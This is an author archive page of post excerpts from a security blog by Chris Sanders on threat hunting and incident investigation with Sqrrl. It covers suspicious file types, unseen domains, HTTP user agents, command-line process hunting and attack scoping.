In the first part of this series, I discussed how suspicious file types could lead to the discovery of malicious activity. I also discussed how to hunt for suspicious file types traversing your network using data sources like HTTP proxy events. In this article, I’ll continue our focus on hunting for suspicious files types by examining the presence and execution of files on the host. I’ll also discuss additional steps you can take to help investigate suspicious file types once you’ve discovered them on your network or systems.
Author Archives: Chris Sanders
Not all attacks require the use of malware, but most of them can be traced back to some form of unwanted malicious code executing on a trusted system. The files can be compiled executables, simple scripts, or even office documents hiding malicious macros. While these types of files are normal, experienced hunters know that you can hunt for compromises by examining the download and execution of specific file types known to be associated with malware. In this post, I’ll discuss a few techniques you can use to hunt on the network for file types that could be suspicious given the right context.
Attackers rely on the abstraction provided between domains and IP addresses to make their infrastructure more resilient. A domain name can be registered in a matter of minutes, and multiple domains can be configured to point to the same host. This allows attackers to quickly switch between domains and subdomains to avoid detection. One trick experienced hunters use is to rely on the immature nature of these domains and hunt for malicious activity with that in mind. In this post, I’ll discuss HTTP proxy categorization and demonstrate how you can use Sqrrl to hunt for malware using previously unseen domains.
An attacker will use the minimal amount of effort required to compromise your network. That means when it’s possible to reuse applications, tools, and protocols…. they’ll do it! This is one reason why attackers often use HTTP to facilitate communication to and from infected hosts. In this post, I’ll discuss the HTTP user agent field and demonstrate how you can use Sqrrl to hunt for HTTP-based malware.
Processes are executed on systems in a variety of ways. A process might be executed by a user double-clicking an icon, by an automated service running at startup, or by a script referencing a third-party application. While not every attack requires the use of malware, most of them do require the execution of some type of process, even if it is a legitimate process being used for nefarious purposes. In this post, I’ll discuss how hunting for command line process executions can be a useful strategy for finding evil and how Sqrrl can make finding and investigating these events easier.
As defenders, the critical moment is when we’ve determined that an attacker’s attempt to gain a foothold onto the network was successful. This sets of a chain of investigative activity where we follow breadcrumbs through our data to understand where they attacker went, what their mission is, and what they took. As these breadcrumbs are uncovered, we don’t just have to follow their path, we also must ascertain if similar evidence can be found at other points on the network. This is all part of scoping the attacker to better understand the attack. In this post, I’m going to talk about strategies for attack scoping and discuss how Sqrrl enables them intuitively.
An incident investigation will only go as far as the evidence allows it. Of course, there’s a lot of components that have to come together to make that happen. The network must support the collection of robust and diverse evidence sources and it must be searchable by the analyst. From there, the incident investigation hinges on the ability of the analyst to ask questions, successfully traverse evidence to answer those questions, and draw conclusions from the findings.
Investigations are all about iterating through evidence that helps you make decisions about what events transpired on your network. That sounds easy enough, but asking the right questions and identifying the data you need to answer them is tricky. This problem manifests in two ways. First, not having enough of the right data means you may be unable to answer the questions that will move the investigation forward. Conversely, having too much data may be overwhelming with a tremendous number of fields and complementary evidence sources to examine. In either case, asking good questions and moving towards a conclusion quickly and accurately depends on knowing what data is available to you in any given scenario. In this post, I’ll address these concerns and discuss how Sqrrl helps you better understand your data so that you know where the gaps are and what options you have available to you within the context of an active investigation.
Finding evil is all about asking the right questions, finding answers, and using those answers to ask more questions. Each question and answer represent a decision point, branching the investigation off down a new path. The path of the analyst is far from linear, and sometimes we need to go back and retrace our steps to work from a previous decision point. Just like Hansel and Gretel left breadcrumbs along their path through the woods, we too need breadcrumbs to ensure that we’re fully exploring our hypotheses and seeing the whole picture of an investigation clearly.